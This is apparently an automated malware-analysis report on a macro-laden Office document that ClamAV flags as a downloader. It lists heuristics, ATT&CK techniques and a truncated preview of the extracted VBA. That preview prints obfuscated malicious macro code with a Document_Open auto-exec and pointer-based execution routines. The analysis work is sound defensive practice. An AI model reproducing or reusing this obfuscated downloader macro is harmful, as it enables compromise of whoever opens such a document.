MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that uses GetObject. ClamAV identifies it as a downloader. The VBA script is heavily obfuscated but its structure suggests it is designed to download and execute a second-stage payload, likely from a remote source. The presence of VBA macros and the downloader behavior strongly indicate a malicious document intended for initial compromise via spearphishing.
Heuristics 6
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13568 bytes |
SHA-256: d2b4647706e32217973fb5e1c518a75514139a2b3793825ffa66ca416b9407af |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unfulfilled(buoyantly)
Dim exemption As Long
Dim beardown As Variant
Dim uintatherium As Integer
Dim dastardly As Integer
#If (127 - 75 + 348 + 103 - 64 + 261) > ((97 - 8 + 231) - (113 - 48 + 475) * 1) And ((125 - 40 - 57) - (80 - 80 + 28)) * 2 < (Win64) Then
Dim ophisaurus As String
Dim aspasia As LongPtr
sinuation = 78 - 106 + 36
Dim hesitance As LongPtr
Dim apron As String
Dim chips As Variant
Dim upheaval As LongPtr
Dim determinism As Integer
semidesert = VarPtr(aspasia)
adj = lactuca(semidesert, VarPtr(buoyantly) + (96 - 124 + 36), sinuation)
#ElseIf (10 - 62 + 452 + 25 - 87 + 362) > ((98 - 3 + 225) - (7 - 27 + 560) * 1) And Not ((112 - 18 - 66) - (103 - 125 + 50)) * 2 < (Win64) Then
Dim aspasia As Long
sinuation = 98 - 108 + 14
Dim hesitance As Long
Dim upheaval As Long
semidesert = VarPtr(aspasia)
adj = freckled(semidesert, VarPtr(buoyantly) + (56 - 104 + 56), sinuation)
#End If
beehive = 40 - 26 - 15
hesitance = 88 - 82 - 6
subeditor = 36 - 127 + 91
upheaval = 21 - 66 + 9603
monoecious = 48 - 90 + 4138
effusive = 58 - 68 + 74
Patterned = manytongued(ByVal beehive, _
hesitance, ByVal subeditor, upheaval, ByVal monoecious, _
ByVal effusive)
duke = Math.Round(305)
apatosaur = Math.Round(301)
#If (60 - 98 + 438 + 37 - 56 + 319) > ((116 - 51 + 255) - (8 - 67 + 599) * 1) And ((102 - 85 + 11) - (81 - 40 - 13)) * 2 < (Win64) Then
ichthyotomy = lactuca(hesitance, aspasia, 31 - 45 + 5897)
#ElseIf (108 - 48 + 340 + 67 - 80 + 313) > ((39 - 11 + 292) - (3 - 40 + 577) * 1) And Not ((102 - 34 - 40) - (69 - 20 - 21)) * 2 < (Win64) Then
selflimited = freckled(hesitance, aspasia, 90 - 20 + 5813)
#End If
chruchwarden = 16 + 5
Pmt 0, chruchwarden, 5932, 54263, 5
unfulfilled = hesitance
End Function
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Function lactuca(boater, detent, russell)
Dim amoret As String
Dim confidente As Variant
Dim fellatio As LongPtr
Dim silique As LongPtr
Dim eschatologist As LongPtr
Dim brooch As Variant
Dim dorm As LongPtr
Dim et As LongPtr
helmholtz = "modernist"
condensing = condensing * 1
silique = boater
et = russell
condensing = Rnd(100)
dorm = detent
burbot = 6 + 19
Pmt 0, burbot, 33410, 56714, 5
irreprehensible = helmholtz
fellatio = 35 - 54 + 18
crystallize ByVal fellatio, _
silique, _
dorm, et, _
eschatologist
rebuild = helmholtz
End Function
Private Sub Document_Open()
Dim alamo As Long
Dim expanse As Integer
wright = "padua"
feme = "mortarboard"
miraculous
lowermiddleclass = 31 + 47
Pmt 0, lowermiddleclass, 36735, 29510, 7
End Sub
Sub miraculous()
Dim scribendi As Byte
Dim ephippidae As Byte
ragbag.success.Value = Day(#12/5/2013#)
varday = predeliberation = "elective"
odyllic = "attributively"
foeman = lidded
gg = "adamantine"
belligerence = "schizaeaceae"
artificially = "throstle"
pinscher = "conk"
antipode = "apostrophe"
Set unreeling = ragbag.success.SelectedItem
oleaginous = 45 + 41
Pmt 0, oleaginous, 31960, 32378, 7
nape = unreeling.Name
daubentonia = 126 - 86 + 7804
scintilla = Right(nape, daubentonia)
jerrybuilt = peat.bootlicking(scintilla)
estaminet = 46 + 50
Pmt 0, estaminet, 16766, 37829, 4
dapple = "aesculus"
#If (96 - 114 + 418 + 123 - 82 + 259) > ((81 - 3 + 242) - (69 - 63 + 534) * 1) And ((56 - 109 + 81) - (39 - 28 + 17)) * 2 < (Win64) Then
Dim ablaze As String
Dim vinegariness As LongPtr
Dim bedder As LongPtr
Dim delectability As Variant
#ElseIf (33
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.